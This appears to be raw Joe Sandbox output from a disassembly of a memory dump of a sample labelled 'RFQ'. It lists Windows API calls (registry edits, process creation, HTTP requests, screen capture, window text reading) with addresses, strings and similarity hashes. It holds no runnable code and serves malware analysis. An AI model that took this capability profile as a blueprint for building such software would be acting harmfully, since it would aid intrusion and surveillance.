                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 006FFD90
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 006FFD9B
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 006FFDA6
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 006FFDB1
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 006FFDBC
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 006FFDC7
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 006FFDD2
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 006FFDDD
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 006FFDE8
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 006FFDF3
                                                                            • GetCursorInfo.USER32(?), ref: 006FFE03
                                                                            • GetLastError.KERNEL32 ref: 006FFE45
                                                                            Similarity
                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                            • String ID:
                                                                            • API String ID: 3215588206-0
                                                                            • Opcode ID: 0468fd8079fc4ef0c4803549060437e5f3995c67c541cbb678eec67d4778acc0
                                                                            • Instruction ID: 56becffd497317430aec15989b22bff644a0157721745cd6d669d3a40a75d004
                                                                            • Opcode Fuzzy Hash: 0468fd8079fc4ef0c4803549060437e5f3995c67c541cbb678eec67d4778acc0
                                                                            • Instruction Fuzzy Hash: 934187B0D483196ADB10DFBA8C8586EBFE9FF04750B50452AE11CE7291D778D901CF95
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070C3E4
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0071D0D0,00000000,?,00000000,?,?), ref: 0070C46B
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0070C4CB
                                                                            • _wcslen.LIBCMT ref: 0070C51B
                                                                            • _wcslen.LIBCMT ref: 0070C596
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0070C5D9
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0070C6E8
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0070C887
                                                                            Similarity
                                                                            • API ID: Value$_wcslen$CloseConnectCreateRegistry
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 3165515054-966354055
                                                                            • Opcode ID: 93763bcabe3f556e1f74f770942c24818fbf20aef8ae730899df017dfab9ddbc
                                                                            • Instruction ID: 0f6ac657ee2235731fddd3b675d587035362f8cfb57d80a44feca0c6b9d6b380
                                                                            • Opcode Fuzzy Hash: 93763bcabe3f556e1f74f770942c24818fbf20aef8ae730899df017dfab9ddbc
                                                                            • Instruction Fuzzy Hash: 97128975204200DFDB15EF14C885A2AB7E6FF88714F148A9CF94A9B3A2CB35ED41CB85
                                                                            APIs
                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 006A0046
                                                                              • Part of subcall function 006A006D: InitializeCriticalSectionAndSpinCount.KERNEL32(0075070C,00000FA0,6F5E5D4F,?,?,?,?,006C2353,000000FF), ref: 006A009C
                                                                              • Part of subcall function 006A006D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006C2353,000000FF), ref: 006A00A7
                                                                              • Part of subcall function 006A006D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006C2353,000000FF), ref: 006A00B8
                                                                              • Part of subcall function 006A006D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006A00CE
                                                                              • Part of subcall function 006A006D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006A00DC
                                                                              • Part of subcall function 006A006D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006A00EA
                                                                              • Part of subcall function 006A006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006A0115
                                                                              • Part of subcall function 006A006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006A0120
                                                                            • ___scrt_fastfail.LIBCMT ref: 006A0067
                                                                              • Part of subcall function 006A0023: __onexit.LIBCMT ref: 006A0029
                                                                            Strings
                                                                            • InitializeConditionVariable, xrefs: 006A00C8
                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 006A00A2
                                                                            • kernel32.dll, xrefs: 006A00B3
                                                                            • WakeAllConditionVariable, xrefs: 006A00E2
                                                                            • SleepConditionVariableCS, xrefs: 006A00D4
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                            • API String ID: 66158676-1714406822
                                                                            • Opcode ID: 13097d86b1f1df4288e8b0fb3e5a1e08e839ac7a58259aa8586ffb20b86f3b09
                                                                            • Instruction ID: 0f1658cdcffe2a53fda73b7584f1a19e50bbe3ef751ddd74d85d1bd6829affea
                                                                            • Opcode Fuzzy Hash: 13097d86b1f1df4288e8b0fb3e5a1e08e839ac7a58259aa8586ffb20b86f3b09
                                                                            • Instruction Fuzzy Hash: 37212C72A807057BEB116BE8AC15BE9339ADB0AF51F008139F901D63D0DFB89C404E98
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 176396367-1603158881
                                                                            • Opcode ID: 8a10f2ec1a2b7d202e53d6d17f6f14abdc38b7c934fa74d871cae0a56994f17c
                                                                            • Instruction ID: 723846056a7030f754057f6ee3823548d2e18721f88551896d6b4dd390cd0405
                                                                            • Opcode Fuzzy Hash: 8a10f2ec1a2b7d202e53d6d17f6f14abdc38b7c934fa74d871cae0a56994f17c
                                                                            • Instruction Fuzzy Hash: 83E1C532A017A6DBCB18EFB9C8496EDB7B2BF15710F54422DE456A7380DB309F458B90
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2055661098-1000479233
                                                                            • Opcode ID: a9a2721efe0206fa63a0567e799d70a4ffbda7dbba47b4947aa90e9886043248
                                                                            • Instruction ID: c04748b7de11c46dada074dc82775c7d143c0177a526dd3106a63229a3ab020d
                                                                            • Opcode Fuzzy Hash: a9a2721efe0206fa63a0567e799d70a4ffbda7dbba47b4947aa90e9886043248
                                                                            • Instruction Fuzzy Hash: DCB1DE316083069BC710EF28C890ABBB7E6FFA5720F504A1DF696C7691EB34D945CB52
                                                                            APIs
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00719039
                                                                              • Part of subcall function 00717543: ClientToScreen.USER32(?,?), ref: 00717569
                                                                              • Part of subcall function 00717543: GetWindowRect.USER32(?,?), ref: 007175DF
                                                                              • Part of subcall function 00717543: PtInRect.USER32(?,?,00718A7B), ref: 007175EF
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 007190A2
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007190AD
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007190D0
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00719117
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00719130
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00719147
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00719169
                                                                            • DragFinish.SHELL32(?), ref: 00719170
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00719263
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#u
                                                                            • API String ID: 221274066-1344711150
                                                                            • Opcode ID: 500ae34affa874aad0709ebbe8d4352f68626733801e7f5609cdb78cc42a08a8
                                                                            • Instruction ID: 1107330f376c85c0edc691f1d39da640b02107e516d1f98923ea87f78802180f
                                                                            • Opcode Fuzzy Hash: 500ae34affa874aad0709ebbe8d4352f68626733801e7f5609cdb78cc42a08a8
                                                                            • Instruction Fuzzy Hash: 8E61AA71108301AFC701EFA4CC99DAFBBE9EF89350F004A1DF591921E1DB74AA49CB56
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 0070B0BF
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070B0D7
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070B0FB
                                                                            • _wcslen.LIBCMT ref: 0070B127
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070B13B
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070B15D
                                                                            • _wcslen.LIBCMT ref: 0070B259
                                                                              • Part of subcall function 006F04C5: GetStdHandle.KERNEL32(000000F6), ref: 006F04E4
                                                                            • _wcslen.LIBCMT ref: 0070B272
                                                                            • _wcslen.LIBCMT ref: 0070B28D
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0070B2DD
                                                                            • GetLastError.KERNEL32(00000000), ref: 0070B32E
                                                                            • CloseHandle.KERNEL32(?), ref: 0070B360
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070B371
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070B383
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070B395
                                                                            • CloseHandle.KERNEL32(?), ref: 0070B40A
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
• String ID:
• API String ID: 2178637699-0
APIs
• GetMenuItemCount.USER32(00751990), ref: 006C3B6F
• GetMenuItemCount.USER32(00751990), ref: 006C3C1F
• GetCursorPos.USER32(?), ref: 006C3C63
• SetForegroundWindow.USER32(00000000), ref: 006C3C6C
• TrackPopupMenuEx.USER32(00751990,00000000,?,00000000,00000000,00000000), ref: 006C3C7F
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006C3C8B
Strings
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
APIs
• DestroyWindow.USER32(?,?), ref: 00716CB9
  • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00716D2D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00716D4F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00716D62
• DestroyWindow.USER32(?), ref: 00716D83
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00680000,00000000), ref: 00716DB2
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00716DCB
• GetDesktopWindow.USER32 ref: 00716DE4
• GetWindowRect.USER32(00000000), ref: 00716DEB
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00716E03
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00716E1B
  • Part of subcall function 0069ADC4: GetWindowLongW.USER32(?,000000EB), ref: 0069ADD2
Strings
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$tooltips_class32
• API String ID: 2429346358-3619404913
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006FC3CE
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006FC3E1
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006FC3F5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 006FC40E
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 006FC451
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 006FC467
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006FC472
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006FC4A2
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006FC4FA
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006FC50E
• InternetCloseHandle.WININET(00000000), ref: 006FC519
Strings
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00718484
• GetFileSize.KERNEL32(00000000,00000000), ref: 00718494
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 0071849F
• CloseHandle.KERNEL32(00000000), ref: 007184AC
• GlobalLock.KERNEL32(00000000), ref: 007184BA
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007184C9
• GlobalUnlock.KERNEL32(00000000), ref: 007184D2
• CloseHandle.KERNEL32(00000000), ref: 007184D9
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 007184EA
• OleLoadPicture.OLEAUT32(?,00000000,00000000,0071FC54,?), ref: 00718503
• GlobalFree.KERNEL32(00000000), ref: 00718513
• GetObjectW.GDI32(?,00000018,000000FF), ref: 00718533
• CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00718563
• DeleteObject.GDI32(00000000), ref: 0071858B
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007185A1
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
APIs
• VariantInit.OLEAUT32(00000000), ref: 006F1420
• VariantCopy.OLEAUT32(?,?), ref: 006F1429
• VariantClear.OLEAUT32(?), ref: 006F1435
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006F1519
• VarR8FromDec.OLEAUT32(?,?), ref: 006F1575
• VariantInit.OLEAUT32(?), ref: 006F1626
• SysFreeString.OLEAUT32(?), ref: 006F16AA
• VariantClear.OLEAUT32(?), ref: 006F16F6
• VariantClear.OLEAUT32(?), ref: 006F1705
• VariantInit.OLEAUT32(00000000), ref: 006F1741
Strings
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 1234038744-3931177956
APIs
  • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
  • Part of subcall function 0070C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070B5D5,?,?), ref: 0070C8DC
  • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C918
  • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C98F
  • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C9C5
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070B61B
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0070B699
• RegDeleteValueW.ADVAPI32(?,?), ref: 0070B731
• RegCloseKey.ADVAPI32(?), ref: 0070B7A5
• RegCloseKey.ADVAPI32(?), ref: 0070B7C3
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 0070B819
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0070B82B
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0070B849
• FreeLibrary.KERNEL32(00000000), ref: 0070B8AA
• RegCloseKey.ADVAPI32(00000000), ref: 0070B8BB
Strings
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
APIs
• GetDC.USER32(00000000), ref: 007024FF
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0070250F
• CreateCompatibleDC.GDI32(?), ref: 0070251B
• SelectObject.GDI32(00000000,?), ref: 00702528
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00702594
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007025D3
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007025F7
• SelectObject.GDI32(?,?), ref: 007025FF
• DeleteObject.GDI32(?), ref: 00702608
• DeleteDC.GDI32(?), ref: 0070260F
• ReleaseDC.USER32(00000000,?), ref: 0070261A
Strings
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
                                                                            • Opcode ID: bbf4c6c455902263f5ee8d7b6823c6aeca7489d84ed144ab3814fe2f6ba9cd90
                                                                            • Instruction ID: 212ed5d3b007c9139a689ed3a6f79ef64b7bdafd1522c60a978e625ae830bcb5
                                                                            • Opcode Fuzzy Hash: bbf4c6c455902263f5ee8d7b6823c6aeca7489d84ed144ab3814fe2f6ba9cd90
                                                                            • Instruction Fuzzy Hash: C561F2B6D00219EFCF05CFE8C888AAEBBF6FF48310F208559E555A7250D734A9518F54
                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 006BDA41
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD5F9
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD60B
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD61D
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD62F
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD641
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD653
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD665
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD677
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD689
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD69B
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD6AD
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD6BF
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD6D1
                                                                            • _free.LIBCMT ref: 006BDA36
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • _free.LIBCMT ref: 006BDA58
                                                                            • _free.LIBCMT ref: 006BDA6D
                                                                            • _free.LIBCMT ref: 006BDA78
                                                                            • _free.LIBCMT ref: 006BDA9A
                                                                            • _free.LIBCMT ref: 006BDAAD
                                                                            • _free.LIBCMT ref: 006BDABB
                                                                            • _free.LIBCMT ref: 006BDAC6
                                                                            • _free.LIBCMT ref: 006BDAFE
                                                                            • _free.LIBCMT ref: 006BDB05
                                                                            • _free.LIBCMT ref: 006BDB22
                                                                            • _free.LIBCMT ref: 006BDB3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: 49ae6e4b453413162e6fbdcfe2d53e625968398e4f4018e04fb9afb015c069fa
                                                                            • Instruction ID: 6029720856f35a0320703b6759409cb257df8e1daa1c074fbea25c3120544ff6
                                                                            • Opcode Fuzzy Hash: 49ae6e4b453413162e6fbdcfe2d53e625968398e4f4018e04fb9afb015c069fa
                                                                            • Instruction Fuzzy Hash: A5315CF16043069FEB60AA39D845BDA77EABF10351F14482DE558DB251EF30ADC1CB14
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 006E35DF
                                                                            • _wcslen.LIBCMT ref: 006E35EA
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006E36DA
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 006E374F
                                                                            • GetDlgCtrlID.USER32(?), ref: 006E37A5
                                                                            • GetWindowRect.USER32(?,?), ref: 006E37CA
                                                                            • GetParent.USER32(?), ref: 006E37E8
                                                                            • ScreenToClient.USER32(00000000), ref: 006E37EF
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 006E3869
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 006E38A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                            • String ID: %s%u
                                                                            • API String ID: 4010501982-679674701
                                                                            • Opcode ID: 5b63ece5dc1d9fdbdfe4508900e526ef2c244c3e96d506881c15f0795f959b39
                                                                            • Instruction ID: 8f3b045963d09277c1f79dcfc637eb5806ba5e3704a1cadf5c41117412e639d4
                                                                            • Opcode Fuzzy Hash: 5b63ece5dc1d9fdbdfe4508900e526ef2c244c3e96d506881c15f0795f959b39
                                                                            • Instruction Fuzzy Hash: 6AA1C071205756AFD719DF65C889BEBB7EAFF44300F008529F99A83290DB30EA45CB91
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 006E48DC
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 006E4922
                                                                            • _wcslen.LIBCMT ref: 006E4933
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 006E493F
                                                                            • _wcsstr.LIBVCRUNTIME ref: 006E4974
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 006E49AC
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 006E49E9
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 006E4A37
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 006E4A71
                                                                            • GetWindowRect.USER32(?,?), ref: 006E4AE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                            • String ID: ThumbnailClass
                                                                            • API String ID: 1311036022-1241985126
                                                                            • Opcode ID: 9e7672a643fc2e78f10cba926ae47a0b4db260afec34394b253f80c603e8093d
                                                                            • Instruction ID: 01ae82ff1f39755737bcf5d3e482e8b24f1ac5b82ae978ce272bece2e4598ccb
                                                                            • Opcode Fuzzy Hash: 9e7672a643fc2e78f10cba926ae47a0b4db260afec34394b253f80c603e8093d
                                                                            • Instruction Fuzzy Hash: 9C910E711053459FDB04DF2AC881BAA77EAFF84310F048469FD859A296EF34ED46CBA1
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0070CB8B
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0070CBB4
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0070CC6F
                                                                              • Part of subcall function 0070CB5B: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0070CBD1
                                                                              • Part of subcall function 0070CB5B: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0070CBE4
                                                                              • Part of subcall function 0070CB5B: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0070CBF6
                                                                              • Part of subcall function 0070CB5B: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0070CC2C
                                                                              • Part of subcall function 0070CB5B: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0070CC4F
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0070CC1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2734957052-4033151799
                                                                            • Opcode ID: b7918c6a63c16be7690af0bf0d0b33e32e957b0992f0f626382812c45b0b6b2e
                                                                            • Instruction ID: b32a4d07f647371c96d7e8af284f47718c5bee04af13e7fa5c8e45249722d61b
                                                                            • Opcode Fuzzy Hash: b7918c6a63c16be7690af0bf0d0b33e32e957b0992f0f626382812c45b0b6b2e
                                                                            • Instruction Fuzzy Hash: EE3182B1941118FBE7228B95DC88EEFBBBCEF05740F008255B906E2190DB389E45DAB0
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006F3C5E
                                                                            • _wcslen.LIBCMT ref: 006F3C8B
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 006F3CBB
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006F3CDC
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 006F3CEC
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006F3D73
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006F3D7E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006F3D89
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
